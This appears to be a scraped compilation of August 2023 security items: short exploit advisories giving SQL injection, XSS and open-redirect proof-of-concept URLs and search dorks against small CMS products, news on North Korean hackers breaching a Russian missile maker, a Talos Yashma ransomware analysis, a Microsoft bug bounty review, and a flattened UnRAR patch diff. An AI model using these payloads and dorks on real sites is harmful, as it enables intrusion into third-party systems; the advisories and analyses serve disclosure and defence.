CSC-CMS version 1.0.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CSC-CMS v1.0.0 Sql Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://creativesales.hu/                                                                                           |  | # Dork      : A honlapot a Creative Sales Consulting készítette.                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Panel : http://127.0.0.1/kkvpalyazathu/admin/[+] http://127.0.0.1/kkvpalyazathu/hirolvaso.php?id=7 <====| inject hereGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CSC-CMS 1.0.0 SQL Injection

CMS Genetics Centre version 4.0.1 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CMS Genetics Centre v 4.0.1 Sql injection Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://nanobirdtech.com/                                                                                          |  | # Dork      : by Nanobird Technologies                                                                                           |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  http://127.0.0.1/www/omanadvancedfertilitycom/en/news-detail.php?id=2 <======| inject here[+]  Panel : http://127.0.0.1/www/omanadvancedfertility/com/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |=======================================================================================================================================

CMS Genetics Centre 4.0.1 SQL Injection

CMS BMGI International version 4.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMS BMGI International v 4.0 XSS Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://batel.net/                                                                                                 |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : /_Admin_root/authentification.php?lang=%3Cscript%3Ealert(/indoushka/);%3C/script%3E&pw=1&user=yymfqisv[+] http://127.0.0.1/inspa-dzorg/_Admin_root/authentification.php?lang=%3Cscript%3Ealert(/indoushka/);%3C/script%3E&pw=1&user=yymfqisvGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS BMGI International 4.0 Cross Site Scripting

Coupons CMS version 6.00 suffers from an open redirection vulnerability.

**Coupons CMS 6.00 Open Redirection**

Posted Aug 7, 2023

Authored by indoushka

Coupons CMS version 6.00 suffers from an open redirection vulnerability.

tags | exploit

SHA-256 | 6f1d614850036145fc311bc9ae50d863cc9b83863f612a7fda85ed6a6e596b35

Download | Favorite | View

**Coupons CMS 6.00 Open Redirection**

    ====================================================================================================================================| # Title     : Coupons CMS v6.00 URL redirection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/coupons-cms-500/11686064?ref=shadyro                                                   |  | # Dork      : Powered by CouponsCMS.com                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+]  use payload : /plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1[+]  http://127.0.0.1/couponscms.com/demo/plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,889)
*   Arbitrary (16,186)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,341)
*   DoS (23,405)
*   Encryption (2,369)
*   Exploit (51,802)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,765)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,688)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,600)
*   Python (1,534)
*   Remote (30,742)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,354)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,754)
*   Web (9,655)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,919)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,807)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,382)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,683)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,797)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

Coupons CMS 6.00 Open Redirection

Conference Management Software version 3.5.1 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Conference Management Software V3.5.1 Sql injection Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir/                                                                                                  |  | # Dork      : Designer Asan Hamayesh (Conference Management Software) Ver. 3.5.1                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] http://127.0.0.1/icmaes2017com//en/files.php?id=2 <===== inject here[+] Login : http://127.0.0.1/icmaes2017com/en/signin.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Conference Management Software 3.5.1 SQL Injection

Two different North Korean nation-state actors have been linked to a cyber intrusion against the major Russian missile engineering company NPO Mashinostroyeniya.
Cybersecurity firm SentinelOne said it identified "two instances of North Korea related compromise of sensitive internal IT infrastructure," including a case of an email server compromise and the deployment of a Windows backdoor dubbed

Two different North Korean nation-state actors have been linked to a cyber intrusion against the major Russian missile engineering company NPO Mashinostroyeniya.

Cybersecurity firm SentinelOne said it identified "two instances of North Korea related compromise of sensitive internal IT infrastructure," including a case of an email server compromise and the deployment of a Windows backdoor dubbed OpenCarrot.

The breach of the Linux email server has been attributed to ScarCruft. OpenCarrot, on the other hand, is a known implant previously identified as used by the Lazarus Group. The attacks were flagged in mid-May 2022.

A rocket design bureau based in Reutov, NPO Mashinostroyeniya was sanctioned by the U.S. Treasury Department in July 2014 in connection to "Russia's continued attempts to destabilize eastern Ukraine and its ongoing occupation of Crimea."

While both ScarCruft (aka APT37) and the Lazarus Group are affiliated to North Korea, it's worth noting that the former is overseen by the Ministry of State Security (MSS). Lazarus Group is part of Lab 110, which is a constituent of the Reconnaissance General Bureau (RGB), the country's primary foreign intelligence service.

The development marks a rare convergence where two North Korea-based independent threat activity clusters have targeted the same entity, indicating a "highly desirable strategic espionage mission" that could benefit its controversial missile program.

OpenCarrot is implemented as Windows dynamic-link library (DLL) and supports over 25 commands to conduct reconnaissance, manipulate file systems and processes, and manage several communication mechanisms.

"With a wide range of supported functionality, OpenCarrot enables full compromise of infected machines, as well as the coordination of multiple infections across a local network," security researchers Tom Hegel and Aleksandar Milenkoski said.

The exact method used to breach the email server remains unknown, although the group is known to rely on social engineering to phish victims and deliver backdoors like RokRat.

What's more, a closer inspection of the attack infrastructure has revealed two domains centos-packages\[.\]com and redhat-packages\[.\]com, which bears similarities to the names of the threat actors used in the JumpCloud hack in June 2023.

"This incident stands as a compelling illustration of North Korea's proactive measures to covertly advance their missile development objectives, as evidenced by their direct compromise of a Russian Defense-Industrial Base (DIB) organization," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Targets Russian Missile Engineering Firm

By Waqas
North Korean hackers from OpenCarrot and Lazarus breached NPO Mashinostroyeniya, a major Russian missile developer, for at least five months last year.
This is a post from HackRead.com Read the original post: Elite North Korean Hackers Breach Russian Missile Developer

*   **North Korean hackers breached a major Russian missile developer, NPO Mashinostroyeniya, for at least five months.**
*   **Cyber-espionage teams ScarCruft and Lazarus installed stealthy digital backdoors into NPO Mash’s systems.**
*   **It remains unclear if data was stolen or linked to North Korea’s ballistic missile program developments.**
*   **Experts warn that North Korea targets even its allies to acquire critical technologies.**
*   **The breach exposes vulnerabilities in cybersecurity and raises concerns about sensitive technology transfers.**

It has been uncovered that an elite group of North Korean hackers successfully breached the computer networks of a major Russian missile developer for an extended period last year.

The evidence, reviewed by Reuters and analyzed by security researchers, points to cyber-espionage teams associated with the North Korean government, namely ScarCruft (aka APT37, InkySquid, Reaper, and Ricochet Chollima). The same group was also reported to have used the Dolphin Backdoor against South Korea in December 2022.

The researchers also noted tracks of the infamous North Korean state-backed group, Lazarus, in these attacks. This was identified after researchers noted the presence of OpenCarrot Windows OS backdoor. The backdoor is known to be used by the Lazarus group.

These hackers discreetly installed stealthy backdoors into systems at NPO Mashinostroyeniya, commonly referred to as NPO Mash, a prominent rocket design bureau located in Reutov, on the outskirts of Moscow.

Reuters’ investigation did not ascertain whether any data was taken during the intrusion or what information might have been accessed. Nonetheless, it is noteworthy that in the months following the breaches, North Korea declared significant advancements in its banned ballistic missile program, raising suspicions about a possible connection to the breach.

Technical data reveals that the intrusion began approximately in late 2021 and persisted until May 2022 when the company’s IT engineers, as per internal communications reviewed by Reuters, detected the hackers’ activities.

Tom Hegel, a security researcher with US cybersecurity firm SentinelOne, who first uncovered the compromise, highlighted the importance of these findings, providing rare insight into clandestine cyber operations that often elude public scrutiny. Hegel’s team stumbled upon the hack when an NPO Mash IT staffer inadvertently leaked the company’s internal communications while attempting to investigate the North Korean attack by uploading evidence to a private cybersecurity research portal.

> With a high level of confidence, we attribute this intrusion to threat actors independently associated with North Korea. Based on our assessment, this incident stands as a compelling illustration of North Korea’s proactive measures to covertly advance their missile development objectives, as evidenced by their direct compromise of a Russian Defense-Industrial Base (DIB) organization.
> 
> Tom Hegel – SentinelOne

Two independent computer security experts, Nicholas Weaver and Matt Tait, verified the exposed email content’s authenticity by cross-referencing cryptographic signatures with a set of keys controlled by NPO Mash. SentinelOne expressed confidence that North Korea was responsible for the hack, as the cyberspies reused previously known malware and malicious infrastructure utilized in other intrusions.

The information potentially accessed by North Korean hackers includes details about NPO Mash’s hypersonic missile, “Zircon,” which Russian President Vladimir Putin had praised as a promising product capable of reaching speeds around nine times that of sound.

However, missile expert Markus Schiller, who has researched foreign aid to North Korea’s missile program, downplayed the immediate impact of obtaining plans for the Zircon. Schiller asserted that merely possessing drawings wouldn’t be sufficient to replicate the missile’s capabilities, as the process involves more complexities than what appears on paper.

Nevertheless, NPO Mash’s role as a leading Russian missile designer and producer makes it a highly valuable target. As the company’s advancements could have strategic implications, the breach raises concerns about the potential transfer of sensitive missile-related technology to North Korea.

The incident underscores the isolated nation’s willingness to target even its allies, as evidenced by the breach of Russia’s defence technologies. NPO Mashinostroyeniya has played a crucial role in developing hypersonic missiles, satellite technologies, and newer generation ballistic armaments—areas of immense interest to North Korea in its pursuit of an Intercontinental Ballistic Missile (ICBM) capable of striking the mainland United States.

**RELATED ARTICLES**

1.  CIA Wants Russians to Share Secret via its Darknet Site
2.  Russian hacking forums warming up to Chinese hackers
3.  Hackers steal personal data of 1,000 North Korean Defectors

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Elite North Korean Hackers Breach Russian Missile Developer

Cisco Talos discovered an unknown threat actor, seemingly of Vietnamese origin, conducting a ransomware operation that began at least as early as June 4, 2023 with customized Yashma ransomware.

Monday, August 7, 2023 08:08

*   Cisco Talos discovered an unknown threat actor, seemingly of Vietnamese origin, conducting a ransomware operation that began at least as early as June 4, 2023.
*   This ongoing attack uses a variant of the Yashma ransomware likely to target multiple geographic areas by mimicking WannaCry characteristics.
*   The threat actor uses an uncommon technique to deliver the ransom note. Instead of embedding the ransom note strings in the binary, they download the ransom note from the actor-controlled GitHub repository by executing an embedded batch file.

**Threat actor analysis**

Talos assesses with high confidence that this threat actor is targeting victims in English-speaking countries, Bulgaria, China and Vietnam, as the actor’s GitHub account, “nguyenvietphat,” has ransomware notes written in these countries’ languages. The presence of an English version could indicate the actor intends to target a wide range of geographic areas.

Talos assesses with moderate confidence that the threat actor may be of Vietnamese origin because their GitHub account name and email contact on the ransomware notes spoofs a legitimate Vietnamese organization’s name. The ransom note also asks victims to contact them between 7 and 11 p.m. UTC+7, which overlaps with Vietnam’s time zone. We also spotted a slight difference in the Vietnamese language ransom note, as it starts with, “Sorry, your file is encrypted!” in contrast to the others that begin with, “Oops, your files are encrypted!” By saying “sorry,” the threat actor may have intended to show a heightened sensitivity toward victims in Vietnam, which could indicate the attackers themselves are Vietnamese.

We further assess the threat actor began this campaign around June 4, 2023, because they joined GitHub and created a public repository called “Ransomware” on that date, which overlaps with the compilation date of the ransomware binary. In the repository, they added ransom note text files in five languages: English, Bulgarian, Vietnamese, Simplified Chinese and Traditional Chinese.

GitHub repository that contains ransom notes.

**Ransom note**

The actor demands the ransom payment in Bitcoins to the wallet address “bc1qtd4qv0wmgtu2rdr0wr8tka2jg44cgmz04z5mc7” and they double the ransomware price if the victim fails to pay within three days, according to our ransomware note analysis. The actor has an email address, “nguyenvietphat\[.\]n\[at\]gmail\[.\]com,” for the victims to contact them. At the time of our analysis, we had not observed any Bitcoin in the wallet, and the ransom note did not specify an amount, indicating the ransomware operation might still be in a nascent stage.

The ransom note text resembles the well-known WannaCry ransom note, possibly to obfuscate the threat actor’s identity and confuse incident responders.

The ransom note for WannaCry ransomware.

Ransom notes samples of the Yashma variant.

After encryption, the Yashma ransomware variant sets the wallpaper on the victim’s machine, as seen in the image below. It seems that the operator downloaded this picture from www\[.\]FXXZ\[.\]com and embedded it in the Yashma variant binary. The wallpaper set by the Yashma variant in the victim’s machine also mimics the WannaCry ransomware.

Yashma variant wallpaper (left) and WannaCry wallpaper (right).

**Customized Yashma ransomware variant**

The actor deployed a variant of Yashma ransomware, which they compiled on June 4, 2023.  Yashma is a 32-bit executable written in .Net and a rebranded version of Chaos ransomware V5, which appeared in May 2022. In this variant, most of Yashma’s features remained unchanged and have been described by the security researchers at Blackberry, with the exception of a few notable modifications.

Usually, ransomware stores the ransom note text as strings in the binary. However, this variant of Yashma executes an embedded batch file, which has the commands to download the ransom note from the actor-controlled GitHub repository. This modification evades endpoint detection solutions and anti-virus software, which usually detect embedded ransom note strings in the binary.

Contents of the batch file.

Earlier versions of the Yashma ransomware established persistence on the victim machine in the Run registry key and by dropping a Windows shortcut file pointing to the ransomware executable path in the startup folder. The variant we observed also established persistence in the Run registry key. Still, it was modified to create a “.url” bookmark file in the startup folder that points to the dropped executable located at “%AppData%\\Roaming\\svchost.exe”.

A function that creates the bookmark file.

One notable feature the threat actor chose to keep in this variant is Yashma’s anti-recovery capability. After encrypting a file, the ransomware wipes the contents of the original unencrypted files, writes a single character “?” and then deletes the file. This technique makes it more challenging for incident responders and forensic analysts to recover the deleted files from the victim’s hard drive.

The code snippet shows the anti-recovery feature of the ransomware.

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are **62131 - 62143 and 300633 - 300638.**

ClamAV detections are available for this threat:

Win.Ransomware.Hydracrypt-9878672-0

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.

**IOCs**

Indicators of Compromise associated with this threat can be found here.

New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware

We are thrilled to share the results of our collaboration with over 345 security researchers from +45 countries around the world in the past 12 months. Together, we have discovered and fixed more than a thousand potential security issues before they impacted our customers. In recognition of this valuable collaboration, we have awarded $13.

We are thrilled to share the results of our collaboration with over 345 security researchers from +45 countries around the world in the past 12 months. Together, we have discovered and fixed more than a thousand potential security issues before they impacted our customers. In recognition of this valuable collaboration, we have awarded $13.8M as part of the industry-leading Microsoft Bug Bounty Program.

Microsoft Bug Bounty Programs are an essential part of our proactive strategy to protect our customers from security threats. These programs incentivize researchers to find vulnerabilities in high-priority areas, helping Microsoft stay ahead of the curve in the ever-evolving security landscape and emerging technologies. By following Coordinated Vulnerability Disclosure, security researchers make a vital contribution to enhancing the security that millions of Microsoft customers rely on.

The bounty programs span across products and services such as Azure, Edge, M365, Dynamics 365 and Power Platform, Windows, Xbox, and more. Each program has its own scope, eligibility criteria, award range, and submission guidelines to help researchers pursue impactful research without causing unintended harm. These guidelines are tailored to the specific threat model of each product or domain. For detailed information on each program, please visit the Microsoft Bug Bounty Programs website.

**Bounty updates**

We have continued to grow and evolve the Bug Bounty and Research programs in the past 12 months to cover new products, integrations, and expand scope in critical areas, including:

*   Intune Bug Bounty research invitation challenge July 2022
*   New high-impact research scenarios added to the Microsoft 365 Insider Builds on Windows Bounty Program January 2023
*   Microsoft Teams Preview Bug Bounty research invitation challenge January 2023
*   New Bing Bug Bounty research invitation challenge March 2023
*   New severity classification for Online Services added to the Microsoft 365 Bounty Program April 2023
*   New scope added to the Identity Bounty Program June 2023
*   Secure boot research scenarios added to Windows Insider Preview Bounty Program July 2023

**Bounty awards**

Bounty awards are based on the severity and security impact of the bug, as well as the completeness and accuracy of the report. Awards are also aligned with the areas that matter most to our customers, to encourage research in these high-impact areas.

In the coming year we will continue to improve our programs based on your feedback. We appreciate our global security research community for their ongoing partnership and for sharing their expertise to help secure millions of Microsoft customers.

We look forward to strengthening our existing relationships and building new ones.

Stay Secure & Happy Hunting!

Bruce Robinson, Lynn Miyashita, and Madeline Eckert

Microsoft Bug Bounty Team

Microsoft Bug Bounty Program Year in Review: $13.8M in Rewards

UnRAR before 6.2.3 allows extraction of files outside of the destination folder via symlink chains.

Expand Up @@ -12,6 +12,12 @@ CmdExtract::CmdExtract(CommandData \*Cmd) memset(Analyze,0,sizeof(\*Analyze));  
TotalFileCount=0;  
// Common for all archives involved. Set here instead of DoExtract() // to use in unrar.dll too. Allows to avoid LinksToDirs() calls // and save CPU time in no symlinks including ".." in target were extracted. UpLinkExtracted=false;  
Unp=new Unpack(&DataIO); #ifdef RAR\_SMP Unp->SetThreads(Cmd->Threads); Expand Down Expand Up @@ -125,6 +131,8 @@ void CmdExtract::ExtractArchiveInit(Archive &Arc) ArcAnalyzed=false;  
StartTime.SetCurrentTime();  
LastCheckedSymlink.clear(); }  
  
Expand Down Expand Up @@ -618,6 +626,10 @@ bool CmdExtract::ExtractCurrentFile(Archive &Arc,size\_t HeaderSize,bool &Repeat) wcsncpyz(DestFileName,Cmd->DllDestName,ASIZE(DestFileName)); #endif  
if (ExtrFile && Command!='P' && !Cmd->Test && !Cmd->AbsoluteLinks && UpLinkExtracted) ExtrFile=LinksToDirs(DestFileName,Cmd->ExtrPath,LastCheckedSymlink);  
File CurFile;  
bool LinkEntry=Arc.FileHead.RedirType!=FSREDIR\_NONE; Expand Down Expand Up @@ -747,7 +759,17 @@ bool CmdExtract::ExtractCurrentFile(Archive &Arc,size\_t HeaderSize,bool &Repeat) if (Type==FSREDIR\_HARDLINK || Type==FSREDIR\_FILECOPY) { wchar RedirName\[NM\]; ConvertPath(Arc.FileHead.RedirName,RedirName,ASIZE(RedirName));  
// 2022.11.15: Might be needed when unpacking WinRAR 5.0 links with // Unix RAR. WinRAR 5.0 used \\ path separators here, when beginning // from 5.10 even Windows version uses / internally and converts // them to \\ when reading FHEXTRA\_REDIR. // We must perform this conversion before ConvertPath call, // so paths mixing different slashes like \\dir1/dir2\\file are // processed correctly. SlashToNative(Arc.FileHead.RedirName,RedirName,ASIZE(RedirName));  
ConvertPath(RedirName,RedirName,ASIZE(RedirName));  
wchar NameExisting\[NM\]; ExtrPrepareName(Arc,RedirName,NameExisting,ASIZE(NameExisting)); Expand All @@ -761,7 +783,22 @@ bool CmdExtract::ExtractCurrentFile(Archive &Arc,size\_t HeaderSize,bool &Repeat) if (Type==FSREDIR\_UNIXSYMLINK || Type==FSREDIR\_WINSYMLINK || Type==FSREDIR\_JUNCTION) { if (FileCreateMode) LinkSuccess=ExtractSymlink(Cmd,DataIO,Arc,DestFileName); { bool UpLink; LinkSuccess=ExtractSymlink(Cmd,DataIO,Arc,DestFileName,UpLink); UpLinkExtracted|=LinkSuccess && UpLink;  
// We do not actually need to reset the cache here if we cache // only the single last checked path, because at this point // it will always contain the link own path and link can't // overwrite its parent folder. But if we ever decide to cache // several already checked paths, we'll need to reset them here. // Otherwise if no files were created in one of such paths, // let's say because of file create error, it might be possible // to overwrite the path with link and avoid checks. We keep this // code here as a reminder in case of possible modifications. LastCheckedSymlink.clear(); // Reset cache for safety reason. } } else { Expand Down Expand Up @@ -948,8 +985,6 @@ void CmdExtract::UnstoreFile(ComprDataIO &DataIO,int64 DestUnpSize)  
bool CmdExtract::ExtractFileCopy(File &New,wchar \*ArcName,const wchar \*RedirName,wchar \*NameNew,wchar \*NameExisting,size\_t NameExistingSize,int64 UnpSize) { SlashToNative(NameExisting,NameExisting,NameExistingSize); // Not needed for RAR 5.1+ archives.  
File Existing; if (!Existing.Open(NameExisting)) { Expand Down Expand Up @@ -1269,6 +1304,8 @@ void CmdExtract::ExtrCreateDir(Archive &Arc,const wchar \*ArcFileName) DirExist=FileExist(DestFileName) && IsDir(GetFileAttr(DestFileName)); if (!DirExist) { if (!Cmd->AbsoluteLinks && UpLinkExtracted) LinksToDirs(DestFileName,Cmd->ExtrPath,LastCheckedSymlink); CreatePath(DestFileName,true,Cmd->DisableNames); MDCode=MakeDir(DestFileName,!Cmd->IgnoreGeneralAttr,Arc.FileHead.FileAttr); } Expand Down Expand Up @@ -1350,6 +1387,8 @@ bool CmdExtract::ExtrCreateFile(Archive &Arc,File &CurFile)  
MakeNameUsable(DestFileName,true);  
if (!Cmd->AbsoluteLinks && UpLinkExtracted) LinksToDirs(DestFileName,Cmd->ExtrPath,LastCheckedSymlink); CreatePath(DestFileName,true,Cmd->DisableNames); if (FileCreate(Cmd,&CurFile,DestFileName,ASIZE(DestFileName),&UserReject,Arc.FileHead.UnpSize,&Arc.FileHead.mtime,true)) { Expand Down

Tag

#windows